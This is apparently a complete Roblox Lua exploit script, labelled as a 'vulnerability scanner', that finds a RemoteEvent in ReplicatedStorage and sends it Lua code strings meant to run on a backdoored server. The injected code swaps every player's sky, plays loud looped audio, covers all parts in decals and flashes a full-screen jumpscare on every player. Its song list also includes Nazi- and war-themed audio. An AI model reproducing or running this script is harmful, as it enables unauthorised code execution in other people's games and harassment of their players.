local ReplicatedStorage = game:GetService("ReplicatedStorage") local RunService = game:GetService("RunService") local Lighting = game:GetService("Lighting") local Players = game:GetService("Players") local songs = { {Name = "Stop Music", ID = "0", Pitch = 1, Volume = 0}, {Name = "jumpStyle", ID = "126589529369137", Pitch = 0.2, Volume = 10}, {Name = "theme 2 g00by00lan", ID = "130801780664741", Pitch = 0.2, Volume = 50}, {Name = "theme g00by00lan", ID = "139607639508776", Pitch = 0.2, Volume = 10}, {Name = "Slow C00lkidd", ID = "95156028272944", Pitch = 0.2, Volume = 10}, {Name = "1+1 theme", ID = "79641123960085", Pitch = 0.2, Volume = 10}, {Name = "roblox funk", ID = "136932193331774", Pitch = 1, Volume = 10}, {Name = "@blue2spooky yarn", ID = "88222920079364", Pitch = 0.09, Volume = 10}, {Name = "China meme", ID = "121922837560201", Pitch = 0.22, Volume = 10}, {Name = "k00p Theme", ID = "1839246711", Pitch = 0.8, Volume = 10}, {Name = "c00lkidd Theme", ID = "95156028272944", Pitch = 0.3, Volume = 10}, {Name = "retrokidd oid Theme", ID = "104879348278763", Pitch = 0.8, Volume = 10}, {Name = "الله أكبر", ID = "124956805967048", Pitch = 1, Volume = 10}, {Name = "Allah is great.", ID = "85390427326662", Pitch = 0.08, Volume = 10}, {Name = "wont'stop US", ID = "1847661821", Pitch = 1.3, Volume = 10}, {Name = "spooy skeletons", ID = "122552583844805", Pitch = 0.2, Volume = 10}, {Name = "AHHHHH", ID = "3152833592", Pitch = 0.8, Volume = 10}, {Name = "Lnickys Theme", ID = "86412047196482", Pitch = 1, Volume = 10}, {Name = "Gothic", ID = "139488665764275", Pitch = 1, Volume = 10}, {Name = "Backroom", ID = "120817494107898", Pitch = 0.8, Volume = 10}, {Name = "Erica(ww2Germany)", ID = "102894811708275", Pitch = 0.1, Volume = 10}, {Name = "sonic.exe", ID = "133180219581309", Pitch = 0.1, Volume = 10}, {Name = "re join・realm join", ID = "9069609200", Pitch = 1, Volume = 10}, {Name = "CAN'T STOP RAVING", ID = "89787069440374", Pitch = 1, Volume = 10}, {Name = "java 1x3x5x6 Theme", ID = "94284750410104", Pitch = 0.2, Volume = 10}, {Name = "colkax Theme", ID = "71485248296105", Pitch = 1, Volume = 10}, {Name = "get job!!!", ID = "112747391792663", Pitch = 1, Volume = 10}, {Name = "You Are An Idiot Remix", ID = "102295928741521", Pitch = 0.14, Volume = 10}, {Name = "jump style", ID = "90426128566369", Pitch = 1, Volume = 10}, {Name = "USSR", ID = "109261572535017", Pitch = 0.1, Volume = 10}, {Name = "GETOUT!!!", ID = "17573042535", Pitch = 1, Volume = 10}, {Name = "SANEEES", ID = "100093014571503", Pitch = 1, Volume = 10}, {Name = "HERE I COME", ID = "78534559289195", Pitch = 1, Volume = 10}, {Name = "sad song", ID = "125591252722564", Pitch = 0.1, Volume = 10}, {Name = "c00kidd funk", ID = "100828050594137", Pitch = 1, Volume = 10}, {Name = "Low Throat Singing 3", ID = "1845939536", Pitch = 1, Volume = 10}, {Name = "no escape", ID = "18841891575", Pitch = 1, Volume = 10}, {Name = "na## Germany", ID = "1845868993", Pitch = 1, Volume = 10}, {Name = "jumpscare", ID = "6129291390", Pitch = 1, Volume = 10}, {Name = "Erica funk", ID = "72796362292502", Pitch = 0.1, Volume = 10}, {Name = "Squid game", ID = "1843536434", Pitch = 1, Volume = 10}, {Name = "Painters Sparta", ID = "76286178156432", Pitch = 0.2, Volume = 10}, {Name = "Euro Techno", ID = "1839246734", Pitch = 1, Volume = 10}, {Name = "wongaaa", ID = "136201301642679", Pitch = 0.1, Volume = 10}, {Name = "bodypartz", ID = "127653283576622", Pitch = 1, Volume = 10}, {Name = "nowjoinWorld", ID = "8894394467", Pitch = 1, Volume = 10}, {Name = "Spain Music", ID = "77535208560062", Pitch = 1, Volume = 10}, {Name = "loser", ID = "87617522673082", Pitch = 0.7, Volume = 10}, {Name = "godisagirl", ID = "100033974889149", Pitch = 0.8, Volume = 10}, {Name = "gangsta paradise", ID = "5228173823", Pitch = 1, Volume = 10}, {Name = "jump style slow", ID = "1839246711", Pitch = 0.7, Volume = 10}, {Name = "jump style speed up", ID = "1839246711", Pitch = 1.3, Volume = 10}, {Name = "xd", ID = "137709007266721", Pitch = 0.1, Volume = 56} } local decals = { "121677205364391", "118487641604307", "131859056684038", "76543614457095", "136779707260230" } local player = Players.LocalPlayer local sg = Instance.new("ScreenGui", game.CoreGui) sg.Name = "G00byVulnerabilityScanner" sg.ResetOnSpawn = false local scanBtn = Instance.new("TextButton", sg) scanBtn.Size = UDim2.new(0, 220, 0, 60) scanBtn.Position = UDim2.new(0.5, -110, 0.4, -30) scanBtn.Text = "BUSCAR VULNERABILIDADES" scanBtn.BackgroundColor3 = Color3.fromRGB(45, 45, 45) scanBtn.TextColor3 = Color3.new(1, 1, 1) Instance.new("UICorner", scanBtn) local main = Instance.new("Frame", sg) main.Size = UDim2.new(0, 550, 0, 420) main.Position = UDim2.new(0.5, -275, 0.5, -210) main.BackgroundColor3 = Color3.fromRGB(20, 20, 20) main.Visible = false main.Active = true main.Draggable = true Instance.new("UICorner", main) local title = Instance.new("TextLabel", main) title.Size = UDim2.new(1, 0, 0, 40) title.Text = "SCANNER LISTO" title.TextColor3 = Color3.new(1, 1, 1) title.BackgroundColor3 = Color3.fromRGB(180, 0, 0) local function createScroll(pos, label) local s = Instance.new("ScrollingFrame", main) s.Size = UDim2.new(0.31, 0, 0.6, 0) s.Position = pos s.BackgroundColor3 = Color3.fromRGB(30, 30, 30) s.CanvasSize = UDim2.new(0, 0, 5, 0) s.ScrollBarThickness = 5 local l = Instance.new("UIListLayout", s) l.Padding = UDim.new(0, 2) local t = Instance.new("TextLabel", main) t.Size = UDim2.new(0.31, 0, 0, 20) t.Position = UDim2.new(pos.X.Scale, 0, pos.Y.Scale, -22) t.Text = label t.BackgroundTransparency = 1 t.TextColor3 = Color3.new(1,1,1) return s end local sMusic = createScroll(UDim2.new(0.02, 0, 0, 70), "MUSIC") local sSky = createScroll(UDim2.new(0.34, 0, 0, 70), "SKY") local sJump = createScroll(UDim2.new(0.66, 0, 0, 70), "JUMPS") local selSong, selDecal, selJump = songs[1], decals[1], decals[1] for _, s in ipairs(songs) do local b = Instance.new("TextButton", sMusic) b.Size = UDim2.new(1, -10, 0, 25) b.Text = s.Name b.BackgroundColor3 = Color3.fromRGB(40, 40, 60) b.TextColor3 = Color3.new(1, 1, 1) b.TextSize = 10 b.MouseButton1Click:Connect(function() selSong = s title.Text = "SONG: "..s.Name end) end for i, d in ipairs(decals) do local b = Instance.new("TextButton", sSky) b.Size = UDim2.new(1, -10, 0, 30) b.Text = "Decal "..i b.BackgroundColor3 = Color3.fromRGB(60, 40, 40) b.TextColor3 = Color3.new(1, 1, 1) b.MouseButton1Click:Connect(function() selDecal = d title.Text = "SKY: "..i end) local bj = Instance.new("TextButton", sJump) bj.Size = UDim2.new(1, -10, 0, 30) bj.Text = "Jump "..i bj.BackgroundColor3 = Color3.fromRGB(80, 20, 20) bj.TextColor3 = Color3.new(1, 1, 1) bj.MouseButton1Click:Connect(function() selJump = d title.Text = "JUMP: "..i end) end local exec = Instance.new("TextButton", main) exec.Size = UDim2.new(0.46, 0, 0, 45) exec.Position = UDim2.new(0.02, 0, 0.85, 0) exec.Text = "APLICAR CAMBIOS" exec.BackgroundColor3 = Color3.new(0, 0.4, 0) exec.TextColor3 = Color3.new(1, 1, 1) local execJump = Instance.new("TextButton", main) execJump.Size = UDim2.new(0.46, 0, 0, 45) execJump.Position = UDim2.new(0.52, 0, 0.85, 0) execJump.Text = "FORCE JUMPSCARE" execJump.BackgroundColor3 = Color3.new(0.6, 0, 0) execJump.TextColor3 = Color3.new(1, 1, 1) local targetRemote = nil scanBtn.MouseButton1Click:Connect(function() scanBtn.Text = "ANALIZANDO..." task.wait(1) for _, obj in ipairs(ReplicatedStorage:GetDescendants()) do if obj:IsA("RemoteEvent") then targetRemote = obj break end end if targetRemote then scanBtn.Text = "VULNERABILIDAD HALLADA" scanBtn.BackgroundColor3 = Color3.new(0, 0.6, 0) task.wait(0.5) scanBtn.Visible = false main.Visible = true title.Text = "TARGET: " .. targetRemote.Name else scanBtn.Text = "NO SE HALLARON FALLOS" task.wait(1.5) scanBtn.Text = "BUSCAR VULNERABILIDADES" end end) exec.MouseButton1Click:Connect(function() if targetRemote then local code = [[ local musicId = "rbxassetid://]]..selSong.ID..[[" local decalId = "rbxassetid://]]..selDecal..[[" local sky = game.Lighting:FindFirstChild("CustomSky") or Instance.new("Sky", game.Lighting) sky.Name = "CustomSky" sky.SkyboxBk = decalId sky.SkyboxDn = decalId sky.SkyboxFt = decalId sky.SkyboxLf = decalId sky.SkyboxRt = decalId sky.SkyboxUp = decalId local s = workspace:FindFirstChild("GlobalMusic") or Instance.new("Sound", workspace) s.Name = "GlobalMusic" s.SoundId = musicId s.Volume = ]]..selSong.Volume..[[ s.PlaybackSpeed = ]]..selSong.Pitch..[[ s.Looped = true s:Play() for _, v in pairs(game.Workspace:GetDescendants()) do if v:IsA("BasePart") then local d = Instance.new("Decal", v) d.Texture = decalId d.Face = Enum.NormalId.Front end end ]] targetRemote:FireServer(code) end end) execJump.MouseButton1Click:Connect(function() if targetRemote then local jumpCode = [[ for _, p in pairs(game.Players:GetPlayers()) do local sg = Instance.new("ScreenGui", p.PlayerGui) sg.DisplayOrder = 999 local img = Instance.new("ImageLabel", sg) img.Size = UDim2.new(1,0,1,0) img.Image = "rbxassetid://]]..selJump..[[" img.BackgroundColor3 = Color3.new(0,0,0) local s = Instance.new("Sound", workspace) s.SoundId = "rbxassetid://6129291390" s.Volume = 10 s:Play() task.delay(3, function() sg:Destroy() end) end ]] targetRemote:FireServer(jumpCode) end end)